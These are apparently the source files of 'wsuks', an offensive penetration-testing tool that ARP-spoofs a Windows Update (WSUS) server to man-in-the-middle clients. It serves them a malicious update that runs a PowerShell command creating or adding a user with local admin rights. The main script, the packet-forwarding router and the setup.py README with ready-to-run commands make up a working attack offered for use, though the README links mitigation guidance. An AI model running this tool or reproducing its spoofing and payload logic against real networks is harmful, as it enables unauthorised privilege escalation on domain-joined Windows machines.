#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from functools import partial
from http.server import HTTPServer
import logging
import os
from pprint import pformat
import random
from string import digits, ascii_letters
from threading import Thread
from scapy.all import get_if_addr, sniff, conf, IP, TCP, send
from wsuks.helpers.arpspoofer import ArpSpoofer
from wsuks.helpers.logger import initLogger
from wsuks.helpers.argparser import initParser, printBanner
from wsuks.helpers.sysvolparser import SysvolParser
from wsuks.helpers.wsusserver import WSUSUpdateHandler, WSUSBaseServer
from wsuks.helpers.router import Router
from termcolor import colored


class Wsuks:
    def __init__(self, args):
        self.args = args

        self.logger = logging.getLogger("wsuks")
        self.interface = args.interface
        self.hostIp = get_if_addr(self.interface)
        self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
        self.local_password = "".join(random.sample(ascii_letters, 16))

        # Set args
        self.targetIp = args.targetIp  # Never None (required)
        self.executable_file = args.executable.read()
        self.executable_name = os.path.basename(args.executable.name)
        args.executable.close()

        # Set Command
        if "PREFIX" not in args.command:
            self.command = args.command
        else:
            command_prefix = 'New-LocalUser -Name "WSUKS_USER" -Password $(ConvertTo-SecureString "WSUKS_PASSWORD" -AsPlainText -Force) -Fullname "wsuks user" -Description "This user was generated by the wsuks Tool"; '
            if args.username and args.password and args.domain:
                self.logger.success(f"Using domain user for the WSUS attack: User={colored(args.username, 'green', attrs=['bold'])} Password={colored(args.password, 'green', attrs=['bold'])} Domain={colored(args.domain, 'green', attrs=['bold'])}")
                self.command = args.command.replace("PREFIX", "").replace("WSUKS_USER", args.domain + "\\" + args.username).replace("WSUKS_PASSWORD", args.password)
            else:
                self.logger.success(f"Generated local user for the WSUS attack: Username={colored(self.local_username, 'green', attrs=['bold'])} Password={colored(self.local_password, 'green', attrs=['bold'])}")
                self.command = args.command.replace("PREFIX", command_prefix).replace("WSUKS_USER", self.local_username).replace("WSUKS_PASSWORD", self.local_password)
        self.logger.success(f"Command to execute: {self.command}")

        self.wsusIp = args.wsusIp
        self.wsusPort = args.wsusPort  # Default 8530
        self.domain_username = args.username
        self.domain_password = args.password
        self.domain = args.domain
        self.dcIp = args.dcIp

    def run(self):
        # Get the WSUS server IP and Port from the sysvol share
        sysvolparser = SysvolParser()
        if not self.wsusIp:
            self.logger.info("WSUS Server not specified, trying to find it in SYSVOL share on DC")
            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp)
        else:
            self.logger.info(f"WSUS Server specified manually: {self.wsusIp}:{self.wsusPort}")

        #print(conf.route)
        #conf.route.add(host=self.wsusIp, gw=self.hostIp)
        #print(conf.route)

        # Start Arp Spoofing
        arpspoofer = ArpSpoofer()
        arpspoofer.start(self.targetIp, self.wsusIp)

        # Prepare WSUS Update Handler
        router = Router()
        # router.start(self.targetIp, self.hostIp, self.wsusIp, self.interface)

        #t1 = Thread(target=self.run_sniff, args=(self))
        #t1.start()
        #sniff(filter=f"tcp", prn=self.handlePacket, store=0, iface=self.args.interface)
        #print("TEST")

        update_handler = WSUSUpdateHandler(self.executable_file, self.executable_name, f'{self.hostIp}:{self.wsusPort}')
        update_handler.set_resources_xml(self.command)

        self.logger.debug(update_handler)

        # Prepare WSUS HTTP Server
        http_handler = partial(WSUSBaseServer, update_handler)
        http_server = HTTPServer((self.hostIp, self.wsusPort), http_handler)
        try:
            self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
            http_server.serve_forever()
        except KeyboardInterrupt:
            print("")
            self.logger.info("Stopping WSUS Server...")
        finally:
            router.stop()
            arpspoofer.stop()

    def handlePacket(self, packet):
        #and (packet[IP].src == self.targetIp or packet[IP].src == self.hostIp or packet[IP].src == self.wsusIp)
        if IP in packet and TCP in packet and packet[IP].src == self.targetIp:
            packet.show()


def main():
    # Setup
    printBanner()
    args = initParser()

    logger = initLogger(debug=args.debug)
    logger.debug('Passed args:\n' + pformat(vars(args)))

    # Prevent scapy from logging to console
    scapyLogger = logging.getLogger('scapy')
    scapyLogger.handlers.clear()

    if os.geteuid() != 0:
        logger.error("This script must be run as root!")
        exit(1)

    wsuks = Wsuks(args)
    wsuks.run()


if __name__ == '__main__':
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import logging
import traceback
from scapy.all import sniff, IP, TCP, get_if_hwaddr, fragment, TCPSession
from scapy.sendrecv import sendp
from threading import Thread


class Router:
    """
    This class is used to enable MITM attacks with ARP spoofing.
    """

    def __init__(self):
        self.logger = logging.getLogger("wsuks")
        self.isRunning = False
        self.targetIp = None
        self.hostIp = None
        self.hostMac = None
        self.wsusIp = None
        self.interface = None

    def _setRoute(self):
        sniff(session=TCPSession, filter=f"tcp", prn=self._process_packet, store=0, iface=self.interface)

    def _process_packet(self, packet):
        if IP in packet and TCP in packet and packet[IP].src == self.targetIp and packet.dst == self.hostMac and packet[IP].dst == self.wsusIp:
            self.logger.debug(f"Forwarding packet from {packet[IP].src} to {self.hostIp}")
            packet[IP].dst = self.hostIp  # Ziel-IP-Adresse ändern
            del packet[IP].chksum
            del packet[TCP].chksum
            packet.show2(dump=True)
            frags = fragment(packet, fragsize=1000)
            try:
                for frag in frags:
                    sendp(frag, verbose=0, iface=self.interface)  # Send Package
            except Exception as e:
                self.logger.error(f"Error while forwarding packet: {e}")
                traceback.print_exc()

    def start(self, targetIp, hostIp, wsusIp, interface):
        self.targetIp = targetIp
        self.hostIp = hostIp
        self.hostMac = get_if_hwaddr(interface)
        self.wsusIp = wsusIp
        self.interface = interface
        self.isRunning = True

        self.logger.info(f"Set route for target {targetIp} to {hostIp}")
        t2 = Thread(target=self._setRoute)
        t2.daemon = True
        t2.start()

    def stop(self):
        """
        Stop the ARP spoofing process.
        """
        if self.isRunning and self.targetIp:
            self.logger.info(f"Delete route for {self.targetIp} to {self.hostIp}")
            self.isRunning = False
        else:
            self.logger.error("Router is not running")



# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['wsuks', 'wsuks.helpers']

package_data = \
{'': ['*'], 'wsuks': ['executables/*', 'xml_files/*']}

install_requires = \
['bs4>=0.0.1,<0.0.2',
 'impacket>=0.10.0,<0.11.0',
 'lxml>=4.9.3,<5.0.0',
 'scapy>=2.5.0,<3.0.0',
 'termcolor>=2.2.0,<3.0.0']

entry_points = \
{'console_scripts': ['wsuks = wsuks.wsuks:main']}

setup_kwargs = {
    'name': 'wsuks',
    'version': '0.4.2',
    'description': 'A Tool for automating the MITM attack on the WSUS connection',
    'long_description': '![Supported Python versions](https://img.shields.io/badge/python-3.8.1+-blue.svg) [![Twitter](https://img.shields.io/twitter/follow/al3x_n3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)\n# wsuks\n_Weaponizing the WSUS Attack_\n\nGaining local administrative access on a Windows machine that is part of a domain is typically the initial step towards acquiring domain admin privileges during a penetration test. In order to exploit the WSUS attack automatically, this tool spoofs the IP address of the WSUS server within the network using ARP, and when the client requests Windows updates, it provides its own malicious updates instead.\nBy default, a Windows client requests updates every 24 hours. \n\nBoth the executable file served (Default: PsExec64.exe) and the executed command can be changed as needed.\n\nPrerequisits:\n- The target Client must be on the local network\n- The Windows Server Update Service (WSUS) must be configured using HTTP\n\nResult:\n- After successful execution the user provided will be added to the local admin group. If no user was specified a user with the format user[0-9]{5} (e.g. user12345) and a random password will be created\n\n## Installation\nUsing pipx (recommended):\n```\nsudo apt install python3-pipx\npipx ensurepath\npipx install wsuks\nsudo ln -s ~/.local/pipx/venvs/wsuks/bin/wsuks /usr/local/bin/wsuks\n```\n\nUsing poetry:\n```\nsudo apt install python3-poetry\ngit clone https://github.com/NeffIsBack/wsuks\ncd wsuks\nsudo poetry install\n```\n\n## Usage\n❗wsuks must be run as root❗\n\nUsing pipx you can simply run `sudo wsuks ...` anywhere on the system.\\\nUsing poetry you must be in the wsuks folder and begin every command with `sudo poetry run wsuks ...`\n\n#### Specify known WSUS-Server and create local admin user:\n```\nsudo wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20\n```\n#### Specify known WSUS-Server and add provided domain user to local admin group (Domain is required!):\n```\nsudo wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20 -u User -p Password -d Domain.local\n```\n#### Autodiscover the WSUS-Server by only specifying the domain user with the dc-ip:\n```\nsudo wsuks -t 10.0.0.10 -u User -p Password -d Domain.local --dc-ip 10.0.0.1\n```\n\n## About & Mitigation\nIn the [PyWSUS](https://github.com/GoSecure/pywsus) Repository from GoSecure you can find a great documentation how to you could detect and mitigate this attack.\nThey also wrote a great Guide demonstrating how this attack works in detail [here](https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/).\n\nThis Tool is based on the following projects:\n- https://github.com/GoSecure/pywsus\n- https://github.com/GoSecure/wsuspect-proxy\n\n',
    'author': 'Alexander Neff',
    'author_email': 'alex99.neff@gmx.de',
    'maintainer': 'None',
    'maintainer_email': 'None',
    'url': 'None',
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'entry_points': entry_points,
    'python_requires': '>=3.8.1,<4.0.0',
}


setup(**setup_kwargs)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import logging
import sys
import traceback
from impacket.smbconnection import SMBConnection


class SysvolParser():
    def __init__(self):
        self.logger = logging.getLogger("wsuks")
        self.smbClient = None
        self.share = "SYSVOL"
        self.wsusIp = None
        self.wsusPort = None  # Default 8530

    def _createSMBConnection(self, domain, username, password, dcIp, kerberos=False, lmhash='', nthash='', aesKey=''):
        """
        Create a SMB connection to the target
        """
        # SMB Login would be ready for kerberos or NTLM Hashes Authentication if it is needed
        # TODO: Fix remoteName in SMBConnection if this is a bug
        # TODO: Add Kerberos Authentication
        try:
            self.smbClient = SMBConnection(remoteName=dcIp, remoteHost=dcIp, sess_port=int(445))

            if kerberos is True:
                self.smbClient.kerberosLogin(username, password, domain, lmhash, nthash, aesKey, dcIp)
            else:
                self.smbClient.login(username, password, domain, lmhash, nthash)
            self.logger.debug("SMB Connection Established")
            if self.smbClient.isGuestSession() > 0:
                self.logger.debug("GUEST Session Granted")
            else:
                self.logger.debug("USER Session Granted")
        except Exception as e:
            self.logger.error(f"Error: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()

        return self.smbClient

    def _extractWsusServerSYSVOL(self):
        return self.wsusIp, self.wsusPort

    def _closeConnection(self):
        """
        Close the SMB connection
        """
        self.smbClient.close()
        self.logger.debug("SMB Connection Closed")

    def findWsusServer(self, domain, username, password, dcIp):
        try:
            raise NotImplementedError("Autodiscovery from WSUS Server not implemented yet")
        except Exception as e:
            self.logger.error(f"Error: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            sys.exit(1)
        """
        Get the WSUS server from the sysvol share

        :param smbClient: SMB connection to Domain Controller
        :return: WSUS server IP and Port
        """
        if not username or not password or not dcIp or not domain:
            self.logger.error("Error: Domain Controller IP, Username, Password and Domain are required to search for WSUS Server in SYSVOL Share. Exiting...")
            sys.exit(1)

        try:
            self._createSMBConnection(domain, username, password, dcIp)
            self.wsusIp, self.wsusPort = self._extractWsusServerSYSVOL()
        except Exception as e:
            self.logger.error(f"Error: {e}")
            self.logger.error("Error while looking for WSUS Server in SYSVOL Share.")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
        finally:
            try:
                self._closeConnection()
            except:
                pass

        if not self.wsusIp or not self.wsusPort:
            self.logger.error("Error: WSUS-Server-IP not set. Try to specify the WSUS Server manually with --WSUS-Server and -WSUS-Port. Exiting...")
            sys.exit(1)

        return self.wsusIp, self.wsusPort
